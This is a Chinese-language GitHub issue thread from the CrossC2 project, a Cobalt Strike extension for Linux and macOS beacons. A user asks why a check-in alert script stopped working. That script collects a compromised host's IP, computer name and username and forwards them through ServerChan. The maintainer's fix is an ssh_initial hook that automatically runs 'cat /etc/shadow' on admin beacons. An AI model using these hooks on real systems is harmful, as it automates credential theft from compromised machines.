写了个server酱调用上线提醒，使用cross2的mac上线没有提醒

we1h0 commented 1 year ago

如题，windows上线正常提醒。。

on beacon_initial {

    #获取ip、计算机名、登录账号
    println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
    local('$internalIP $computerName $userName');
    $internalIP = replace(beacon_info($1,"internal")," ","_");
    $computerName = replace(beacon_info($1,"computer")," ","_");
    $userName = replace(beacon_info($1,"user")," ","_");

    $cmd = 'python3 /Users/xxx/Tools/CobaltStrike/SeverChan/ServerChan.py' . " --computername " . $computerName . " --internalip " . $internalIP . " --username " . $userName;
    println("Sending server: " . $cmd);
    exec($cmd);
}

这什么原因呢，运行mac的cross2 没有调取cna脚本的操作。

we1h0 commented 1 year ago

理论上连回来teamserver应该都会执行一遍cna脚本才对...为啥弹回来权限后没操作cna脚本..

gloxec commented 1 year ago

Mac & Linux 需使用 ssh_inital #73

on ssh_initial {
    if (-isadmin $1) {
        bshell($1, "cat /etc/shadow");
    }
}

we1h0 commented 1 year ago

Mac & Linux 需要使用ssh_inital #73
on ssh_initial {
  if (-isadmin $1) {
      bshell($1, "cat /etc/shadow");
  }
}

ok,thx

gloxec / CrossC2

写了个server酱调用上线提醒，使用cross2的mac上线没有提醒 #184